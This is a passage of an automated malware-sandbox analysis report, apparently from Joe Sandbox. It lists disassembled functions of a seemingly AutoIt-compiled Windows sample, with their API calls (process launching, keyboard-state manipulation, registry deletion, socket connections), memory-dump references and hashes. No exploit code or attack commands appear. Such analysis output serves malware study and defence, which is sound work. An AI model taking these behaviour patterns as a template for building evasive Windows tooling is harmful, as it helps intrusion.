                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9192e6217a81e8c447e30c571dd1057ad6715d0ab9470d8825742fcb258a77e
                                                      • Instruction ID: ba5849f445b3631b22701c30d8e3bddfa7b7a543e447f1ebcf486f88e7e43eb7
                                                      • Opcode Fuzzy Hash: e9192e6217a81e8c447e30c571dd1057ad6715d0ab9470d8825742fcb258a77e
                                                      • Instruction Fuzzy Hash: 4F715A70900109EFCB14CF98CD89ABEBFB9FF85310F188159F916AB251C734AA51CBA0
                                                      Function 00AEB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(015956A8), ref: 00AEB6A5
                                                      • IsWindowEnabled.USER32(015956A8), ref: 00AEB6B1
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AEB795
                                                      • SendMessageW.USER32(015956A8,000000B0,?,?), ref: 00AEB7CC
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00AEB809
                                                      • GetWindowLongW.USER32(015956A8,000000EC), ref: 00AEB82B
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AEB843
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: c1621940261a9f5d4332f7ec1d05cfaa8642d0608e2246086ff36c873da0fa2d
                                                      • Instruction ID: 48790588f0911b5d62795b5ee6e8f6c6b166ec0c37625f61b2152b7ce13adf0b
                                                      • Opcode Fuzzy Hash: c1621940261a9f5d4332f7ec1d05cfaa8642d0608e2246086ff36c873da0fa2d
                                                      • Instruction Fuzzy Hash: 9A719D34611284AFDB20DF66C9D8FAB7BB9FF49300F1444A9E9459B3A1C731AD51CB60
                                                      Function 00ADF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00ADF75C
                                                      • _memset.LIBCMT ref: 00ADF825
                                                      • ShellExecuteExW.SHELL32(?), ref: 00ADF86A
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                      • GetProcessId.KERNEL32(00000000), ref: 00ADF8E1
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ADF910
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: 0bb4cfa00915610465de3dd8ffdf76c5b1365867ccb24592e8ae8b352cb30a7f
                                                      • Instruction ID: 0e90e95dc590a33758456e0d9ffb3f336eac69374ec64baac51759af1646b739
                                                      • Opcode Fuzzy Hash: 0bb4cfa00915610465de3dd8ffdf76c5b1365867ccb24592e8ae8b352cb30a7f
                                                      • Instruction Fuzzy Hash: 00619275A00619DFCF14EFA4C5959AEBBF5FF48310F14846AE85AAB351CB30AE41CB90
                                                      Function 00AC145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00AC149C
                                                      • GetKeyboardState.USER32(?), ref: 00AC14B1
                                                      • SetKeyboardState.USER32(?), ref: 00AC1512
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AC1540
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AC155F
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AC15A5
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AC15C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 386405f1c9b6cb88aa67c1f8c2d2e13e121a1ef0492cbf3bffbbdb7a746f2e30
                                                      • Instruction ID: 1a22fc37e0ee679de40022434a8c537b0ba66a195c6e9d21f887b1dd573c656b
                                                      • Opcode Fuzzy Hash: 386405f1c9b6cb88aa67c1f8c2d2e13e121a1ef0492cbf3bffbbdb7a746f2e30
                                                      • Instruction Fuzzy Hash: 2651D1A0B047D93EFB3687248C45FBABEA99B47304F09858DE1D59A8C3D798EC84D750
                                                      Function 00AC1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00AC12B5
                                                      • GetKeyboardState.USER32(?), ref: 00AC12CA
                                                      • SetKeyboardState.USER32(?), ref: 00AC132B
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AC1357
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AC1374
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AC13B8
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AC13D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: a542c5e83b3e87fed13c9eba1af4e8b73de548eaba8ae10042de4e563f403282
                                                      • Instruction ID: 916b89c93d2f8206135c40cb06d639d35d152b0a7cbb5b72e0c8b7e78a474822
                                                      • Opcode Fuzzy Hash: a542c5e83b3e87fed13c9eba1af4e8b73de548eaba8ae10042de4e563f403282
                                                      • Instruction Fuzzy Hash: 7051E1A0B046D57DFB3683248C45FBABFA9AB07304F09898DE1D45A9C3D794EC98D760
                                                      Function 00AC589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: d8d06166cc0a432e4ea2d0f966f99ca0f58149f10f1147a773da3c8ffd62e2b0
                                                      • Instruction ID: 11e796f106b43f10ac19e87ddfdee849a363cd0d13e6622d830bd22b75081814
                                                      • Opcode Fuzzy Hash: d8d06166cc0a432e4ea2d0f966f99ca0f58149f10f1147a773da3c8ffd62e2b0
                                                      • Instruction Fuzzy Hash: A9419066C20618B6CB10FBB5898AACFB7BC9F04710F508556F918E3122F634E755C7A9
                                                      Function 00AC38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AC38D3,?), ref: 00AC48C7
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AC38D3,?), ref: 00AC48E0
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00AC38F3
                                                      • _wcscmp.LIBCMT ref: 00AC390F
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AC3927
                                                      • _wcscat.LIBCMT ref: 00AC396F
                                                      • SHFileOperationW.SHELL32(?), ref: 00AC39DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: 3e397b09643a3e4f528dba3f1856d0b7750907bdad0cfcf17d68d014912138e1
                                                      • Instruction ID: 8a5b871a8603cba8c342a83ad8ed96f048aed7f152c1ccb6f4c6ee3ab1c17e95
                                                      • Opcode Fuzzy Hash: 3e397b09643a3e4f528dba3f1856d0b7750907bdad0cfcf17d68d014912138e1
                                                      • Instruction Fuzzy Hash: 9F419FB240C3849ECB51EF64C491EEFB7E8AF88340F00482EB499C7161EA74D688C756
                                                      Function 00AE7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE7519
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE75C0
                                                      • IsMenu.USER32(?), ref: 00AE75D8
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AE7620
                                                      • DrawMenuBar.USER32 ref: 00AE7633
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 6a99594ef896d953cdde9620c2128b3925b2d6b7eaad6681e884b3b592031dfa
                                                      • Instruction ID: 066bf30c303659b22af8cd672860bed4d4de072ed1feed5ae383a256004e8210
                                                      • Opcode Fuzzy Hash: 6a99594ef896d953cdde9620c2128b3925b2d6b7eaad6681e884b3b592031dfa
                                                      • Instruction Fuzzy Hash: A5413875A04689EFDB20DF95D884EAEBBF8FF48314F048129E9159B250DB30AD51CFA0
                                                      Function 00AE122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00AE125C
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AE1286
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00AE133D
                                                        • Part of subcall function 00AE122D: RegCloseKey.ADVAPI32(?), ref: 00AE12A3
                                                        • Part of subcall function 00AE122D: FreeLibrary.KERNEL32(?), ref: 00AE12F5
                                                        • Part of subcall function 00AE122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AE1318
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AE12E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: c07cbb69f8ff25fc423dfe0e35e2dd6f63e3bb166b0d6dc269649ef9c80ce8c8
                                                      • Instruction ID: aede341f206c6e4ef1c977f18ac781ded0785dcf6175b741dadb467962483c1a
                                                      • Opcode Fuzzy Hash: c07cbb69f8ff25fc423dfe0e35e2dd6f63e3bb166b0d6dc269649ef9c80ce8c8
                                                      • Instruction Fuzzy Hash: 563108B1901169BFDB15DBD5DC89AFEB7BCEB08300F00016AE512E6151EA749F459BA0
                                                      Function 00AE653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AE655B
                                                      • GetWindowLongW.USER32(015956A8,000000F0), ref: 00AE658E
                                                      • GetWindowLongW.USER32(015956A8,000000F0), ref: 00AE65C3
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AE65F5
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AE661F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AE6630
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AE664A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: df978e46c0df2bed47430c2f4d4013407cf2f1c813be77aa9f85f05837f0baf3
                                                      • Instruction ID: f458fd7c493215b88f0a07b44f12e5f5d7a5c9a4bd88efb45e3eeb0433a805bc
                                                      • Opcode Fuzzy Hash: df978e46c0df2bed47430c2f4d4013407cf2f1c813be77aa9f85f05837f0baf3
                                                      • Instruction Fuzzy Hash: B931F230704290AFDB20CF5ADC89F553BE1FB6A790F1909A9F5118F2B5CB61A841DB61
                                                      Function 00AD6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AD80CB
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AD64D9
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD64E8
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AD6521
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00AD652A
                                                      • WSAGetLastError.WSOCK32 ref: 00AD6534
                                                      • closesocket.WSOCK32(00000000), ref: 00AD655D
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AD6576
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: e4c63388c6f7860593e9f336b00803ff5e3835f19a3f22228b637b63b7c84433
                                                      • Instruction ID: d4697a40b5c948f273e755130fd1671ee0d39ed406d7249969db9652274c69cf
                                                      • Opcode Fuzzy Hash: e4c63388c6f7860593e9f336b00803ff5e3835f19a3f22228b637b63b7c84433
                                                      • Instruction Fuzzy Hash: B631B371600118AFDB10EF64DD85BBE7BBDEB44750F04806AF9069B391CB74AD45CB61
                                                      Function 00ABE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ABE0FA
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ABE120
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00ABE123
                                                      • SysAllocString.OLEAUT32 ref: 00ABE144
                                                      • SysFreeString.OLEAUT32 ref: 00ABE14D
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00ABE167
                                                      • SysAllocString.OLEAUT32(?), ref: 00ABE175
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 8500f5c5b69f6e6aa2949050d236f5692705ccd05309c9361c7fede5c9db0bad
                                                      • Instruction ID: 26b67a7837a97cbc9a78ca9dc8e4e29a6b06cb2ab421a9266cf16842ef8731a5
                                                      • Opcode Fuzzy Hash: 8500f5c5b69f6e6aa2949050d236f5692705ccd05309c9361c7fede5c9db0bad
                                                      • Instruction Fuzzy Hash: 57215675605108AFDB10EFACDC88DEB77ECEB19760B508235F915CB2A2DA70DD418B64
                                                      Function 00ABFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: c1b8c349abb2e9799fa9b1ae9ad2fb559d3423821da91b093e9915d9edba3748
                                                      • Instruction ID: b2d598c1f190b0004dde09736e4de962e4004ade7fbf58b6d400902142950f8a
                                                      • Opcode Fuzzy Hash: c1b8c349abb2e9799fa9b1ae9ad2fb559d3423821da91b093e9915d9edba3748
                                                      • Instruction Fuzzy Hash: E7213732104255AED734B724DE12FFBB7ACEF52740F188436F98586143EB51AE82D3A5
                                                      Function 00AE783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A61D73
                                                        • Part of subcall function 00A61D35: GetStockObject.GDI32(00000011), ref: 00A61D87
                                                        • Part of subcall function 00A61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A61D91
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AE78A1
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AE78AE
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AE78B9
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AE78C8
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AE78D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 4aebb418cb2a55c1f8444bacf283360be20d6c59c38c3f9fdd6cd85c356d1c9e
                                                      • Instruction ID: d208b87015971cdae94c4c5c4bea9f6057764533d6f98a026bd8e04bae904aa3
                                                      • Opcode Fuzzy Hash: 4aebb418cb2a55c1f8444bacf283360be20d6c59c38c3f9fdd6cd85c356d1c9e
                                                      • Instruction Fuzzy Hash: D21194B2550219BFEF159F61CC85EEB7F6DEF08758F014115FA04A60A0CB729C61DBA4
                                                      Function 00A841C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00A84292,?), ref: 00A841E3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A841EA
                                                      • EncodePointer.KERNEL32(00000000), ref: 00A841F6
                                                      • DecodePointer.KERNEL32(00000001,00A84292,?), ref: 00A84213
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
